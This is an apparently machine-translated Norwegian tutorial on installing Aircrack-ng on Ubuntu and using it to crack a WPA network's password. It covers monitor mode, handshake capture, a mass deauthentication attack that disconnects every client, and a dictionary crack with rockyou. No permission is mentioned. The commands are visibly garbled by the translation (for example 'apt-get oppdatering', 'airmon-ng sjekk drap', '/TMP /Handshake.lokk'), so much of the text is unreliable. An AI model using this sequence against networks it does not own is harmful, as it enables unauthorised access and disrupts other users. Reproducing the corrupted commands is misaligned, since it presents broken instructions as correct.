Installer Aircrack-ng på Ubuntu

Installer Aircrack-ng på Ubuntu
Aircrack-ng er en hel pakke med verktøy for trådløs sikkerhetsrevisjon. Det kan brukes til å overvåke, teste, sprekke eller angripe trådløse sikkerhetsprotokoller som WEP, WPA, WPA2. Aircrack-ng er kommandolinjebasert og er tilgjengelig for Windows og Mac OS og andre UNIX-baserte operativsystemer. Aircrack-Ng Suite inneholder mange verktøy som brukes til forskjellige formål, men her vil vi bare se på noen viktige verktøy som brukes oftere i trådløs sikkerhetstesting.

Airmon-ng

Airmon-Ng brukes til å administrere trådløse kortmodus og for å drepe unødvendige prosesser mens du bruker Aircrack-Ng. For å snuse en trådløs tilkobling, må du endre det trådløse kortet fra administrert modus for å overvåke modus og fly-ng brukes til det formålet.

AIRODUMP-NG

AIRODUMP-NG er en trådløs sniffer som kan fange trådløse data fra ett eller flere trådløse tilgangspunkter. Det brukes til å analysere tilgangspunkter i nærheten og for å fange håndtrykk.

Aireplay-ng

Aireplay-Ng brukes til repriseangrep og som pakkeinjektor. Det kan være de-autentiserende brukere fra AP-ene for å fange håndtrykk.

Airdecap-ng

Airdecap-ng brukes til å dekryptere kryptert WEP, WPA/WPA2 trådløse pakker med kjent nøkkel.

Aircrack-ng

Aircrack-ng brukes til å angripe WPA/WEP trådløse protokoller for å finne nøkkelen.

Installasjon

Aircrack-ng er enkelt å installere i Ubuntu ved å bruke APT. Bare skriv inn følgende kommando, og dette vil installere alle verktøy som er tilgjengelige i Aircrack-Ng Suite.

sudo apt-get oppdatering
sudo apt-get install -y aircrack-ng

Bruk

I denne artikkelen tar vi en rask titt på hvordan du bruker Aircrack-Ng for å knekke et kryptert trådløst nettverk (TR1ckst3R i dette eksemplet) for å finne passordet.

Først av alt, list ut alle tilgjengelige trådløse kort koblet til PC -en din ved å bruke 'IWConfig' -kommandoen.

Vi bruker 'WLXC83A35CB4546' kalt Wireless Card for denne opplæringen (dette kan være annerledes i ditt tilfelle). Nå, drep alle prosessene som kjører på trådløst kort ved hjelp av Airmon-Ng.

ubuntu@ubuntu: ~ $ sudo airmon-ng sjekk drap
Start Monitor -modus på 'WLXC83A35CB4546' ved å skrive
ubuntu@ubuntu: ~ $ sudo airmon-ng start wlxc83a35cb4546

Nå har Airmon-NG startet Monitor-modus på trådløst kort, det vil vises som et annet navn 'WLAN0mon'. Kjør 'iwconfig' igjen for å liste opp trådløse detaljer.

Bruk deretter AiroDump-Ng for å se nærliggende trådløse tilgangspunkter og deres egenskaper.

ubuntu@ubuntu: ~ $ sudo airoDump-ng wlan0mon

Du kan begrense søk ved hjelp av Mac (-bssid) og kanal (-c) filtre. For å fange håndtrykk (håndtrykk inneholder kryptert passord), må vi lagre pakkene våre et sted ved å bruke "-skriv" -alternativet. Type,

ubuntu@ubuntu: ~ $ sudo airoDump-ng--bssid 6c: b7: 49: fc: 62: e4
-C 11 WLAN0mon -Skriv /TMP /Handshake.lokk
--BSSID: Access Points MAC -adresse
-C: Access Point's Channel [1-13]
--Skriv: Butikker fangede pakker på et definert sted

Nå må vi de-autentisere alle enheter fra dette tilgangspunktet ved hjelp av AirePlay-NG-verktøyet. Skrive

ubuntu@ubuntu: ~ $ sudo aireplay -ng -0 100 -a [mac_add] wlan0mon

-A: Spesifiser tilgangspunkter Mac for AirePlay-ng

-0: Spesifiser antall DEAUTH -pakker som skal sendes

Etter en stund vil alle enheter bli koblet fra det tilgangspunktet, når de vil prøve å koble seg på nytt, vil det å kjøre Airrodump-ng fange håndtrykk. Det vil vises på toppen av å løpe Airrodump-ng.

Håndtrykk lagres i '/tmp/' katalog, og inneholder kryptert passord som kan tvinges frakoblet ved hjelp av en ordbok. For å knekke passordet, bruker vi Aircrack-ng. Type

ubuntu@ubuntu: ~ $ sudo aircrack-ng /tmp /håndtrykk.CAP-01.Cap -W
/usr/share/wordlists/rockyou.tekst
-W: Spesifiser ordboken

Aircrack-ng vil gå gjennom listen over passord, og hvis den blir funnet, vil den vise passordet som brukes som tast.

I dette tilfellet fant Aircrack-ng passordet som ble brukt '123456789'.

Stopp Monitor-modus på trådløst kort og start nettverkssjefen på nytt.

ubuntu@ubuntu: ~ $ sudo airmon-ng stopp wlan0mon
ubuntu@ubuntu: ~ $ sudo service nettverk-manager omstart

Konklusjon

Aircrack-ng kan brukes til å revidere trådløs sikkerhet eller for å knekke glemte passord. Det er noen andre lignende verktøy tilgjengelig for dette formålet som Kismet, men Aircrack-Ng er bedre kjent for god støtte, allsidighet og å ha et bredt spekter av verktøy. Det har enkelt å bruke kommandolinjegrensesnitt som enkelt kan automatiseres ved hjelp av et hvilket som helst skriptspråk som Python.